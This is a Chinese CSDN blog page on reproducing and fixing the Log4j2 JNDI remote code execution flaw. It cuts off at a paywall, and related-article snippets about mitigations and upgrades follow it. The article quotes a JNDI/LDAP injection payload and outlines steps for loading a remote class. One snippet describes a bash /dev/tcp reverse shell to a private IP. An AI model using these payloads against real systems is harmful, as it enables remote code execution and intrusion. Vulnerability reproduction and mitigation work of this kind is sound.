lo4j2 漏洞复现过程及解决方案

最新推荐文章于 2024-04-10 03:44:31 发布
最新推荐文章于 2024-04-10 03:44:31 发布
阅读量325 收藏
点赞数
文章标签: log4j java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/javagty6778/article/details/128640728
版权

lo4j2 漏洞复现过程及解决方案

背景

近日,阿里云团队发现并报告了 log4j2 的一个漏洞。

由于 log4j2 是一个依赖较广的底层库,所以影响范围很大。影响程度严重,有多严重呢? 这么说吧,是灾难性的

复现漏洞

环境介绍

  • 操作系统:macos Catalina
  • jdk 版本:11.0.9.1
  • log4j2 版本:2.13.3(使用 springboot 2.3.2.RELEASE 间接依赖)

原理介绍

引用公众号:“小林 coding” 的一张图:

使用 log4j2 正常打日志的时候没事儿,比如:

logger.info("this is {}", "log4j2 demo");

但如果你的日志中包含 “${ ” 开头,“}” 结尾的内容就会被解析出来,单独处理。

而如果“${}” 所包裹的内容是类似这样的:jndi:ldap://127.0.0.1:1389/#Exploit,则有可能触发这个漏洞。

复现具体流程是这样的:

1.先写一段想要被远程执行的 java 代码,然后编译成 class 文件2.将 HTTP Server 启动,保证可以通过 Http Server 访问到这个 class 文件。3.将 LDAP Server 启动,并将 Http Server 上的那个 class 文件注册上去。4.启动 java 应用程序,利用 lo

最低0.47元/天 解锁文章
哈喽沃德er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
log4j2漏洞原理详解、漏洞漏洞利用
Cwillchris的博客
03-13 1335
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实的用来实网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
【重核】Spring Boot 最新版发布,一招解决 Log4j2 核弹级漏洞
最新发布
2401_83916326的博客
04-18 807
当然,如果只是为了解决 Log4j2 的漏洞而升级 Spring Boot 主版本,如果不是必须,追最新版本那大可不必,解决漏洞可以只升级 Log4j2 的版本即可。为了解决 Log4j2 近期发生的核弹级漏洞,Spring Boot 之前说新版本会升级到 Log4j v2.15.0,其中囊括了JVM、锁、并发、Java反射、Spring原理、微服务、Zookeeper、数据库、数据结构等大量知识点。其他的 Spring Boot 2.4.x 及以下的版本线不受支持。Gradle 项目的升级也是同理,略。
速度!快速临时解决Log4j惊天漏洞
Galaxy_0的博客
02-15 636
速度!快速临时解决Log4j惊天漏洞
log4j2漏洞源码分析
weixin_45682070的博客
12-14 3515
前言: 上篇分析了jndi+ldap的利用,这两天新爆出来的漏洞log4j2中,结合恶意payload可执行远程恶意代码 影响范围:Apache Log4j 2.x < 2.15.0-rc2,而且利用难度低,利用要求少 紧急缓解措施(最好升级最新版本): (1) 修改jvm参数 -Dlog4j2.formatMsgNoLookups=true (2) 修改配置log4j2.formatMsgNoLookups=True (3) 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISAB
漏洞分析】关于Log4j2远程代码执行漏洞解决方案
olga5abl的博客
12-15 4868
经安博通安全研究团队分析,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受到影响,漏洞等级为高危。
Log4j漏洞解决方案,亲测
weixin_42492886的博客
12-14 1万+
log4j漏洞解决方案,亲测
Springboot整合与使用log4j2日志框架【详解版】
无边热爱,来日方长
06-04 3384
Springboot整合与使用log4j2日志框架【详解版】
lo4j2数据开发必备帮你规避不必要的线上bug
10-22
log4j2.xml日志文件,简单实用,配置齐全,你值得拥有
lo4j详细讲解及详细文档
05-09
lo4j详细讲解及详细文档,里面还附带着api文档
Lo4j用法及实例
03-01
博文链接:https://jwfpd.iteye.com/blog/43227
lo4j配置理解
04-10
NULL 博文链接:https://jungh.iteye.com/blog/1669017
spring-boot-starter-log4j2
09-25
此资源包含spring-boot-starter-log4j2日志框架所需的jar包及版本,童叟无欺,真实有效,放心下载
【重核】Spring Boot 最新版发布,2024年最新springboot教学视频
2401_84103512的博客
04-10 1322
最值得注意的,在依赖升级中升级了 Log4j2:为了解决 Log4j2 近期发生的核弹级漏洞,Spring Boot 之前说新版本会升级到 Log4j v2.15.0,Log4j2 漏洞终极方案1、Spring Boot 项目大家如果在用 2.6.x 和 2.5.x 版本线的,只需要升级到最新的 2.6.2, 2.5.8 即可:2.6.2pom这两个版本都会升级到最新版本其他的 Spring Boot 2.4.x 及以下的版本线不受支持。
Spring Boot发布2.6.2、2.5.8:升级log4j2到2.17.0
程序猿DD
12-22 2407
12月22日,Spring官方发布了Spring Boot 2.5.8(包括46个错误修、文档改进和依赖项升级)和2.6.2(包括55个错误修、文档改进和依赖项升级)。 这两个版本均为缺陷修版本,值得注意的是再这两个版本中更新了最近困扰大家的log4j2版本升级,如果正在使用log4j2的小伙伴,可以做此升级。 2.6.2版本内容 用户已经可以通过下面的Maven坐标获取2.6.2的依赖: <parent> <groupId>org.springframework.boot
Log4j2 重大漏洞解决方案
热门推荐
小夏陌的博客
12-14 7万+
从12月10日(上周五)开始,朋友圈,各种论坛、公众号和群,都在讨论一个Log4j的漏洞,多少程序员半夜爬起来改代码,甚至威胁到了全球网络安全。为什么这个漏洞反应这么强烈呢?
SpringBoot项目集成log4j2日志组件
臻实
06-13 163
SpringBoot项目集成log4j2日志组件
Apache Log4j2漏洞
weixin_51151498的博客
01-23 1354
Apache Log4j2漏洞
Log4j2
weixin_41884118的博客
02-20 530
软件版本:Java 8、log4j 2.12.1 1、配置 1.1、加载配置 Log4j2能够在初始化期间自动查找配置文件进行配置;按照优先级查找配置文件直到找到,优先级如下: 1、查找系统属性log4j.configurationFile对应的配置文件 2、在classpath下查找log4j2-test.properties 3、在classpath下查找log4j2-test.yam...
Log4j2官方文档翻译、学习笔记之三——Layouts的分类及常用类型示例
zhoucheng05_13的博客
11-18 5428
官方文档本节地址:http://logging.apache.org/log4j/2.x/manual/layouts.htmlLayouts是什么官方文档:“An Appender uses a Layout to format a LogEvent into a form that meets the needs of whatever will be consuming the log eve
lo4j的jar在哪里下载
03-25
A: log4j的jar可以从官方网站或Maven仓库下载。官方网站地址为:https://logging.apache.org/log4j,Maven仓库地址为:https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core。可以根据需要选择相应的版本进行下载。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值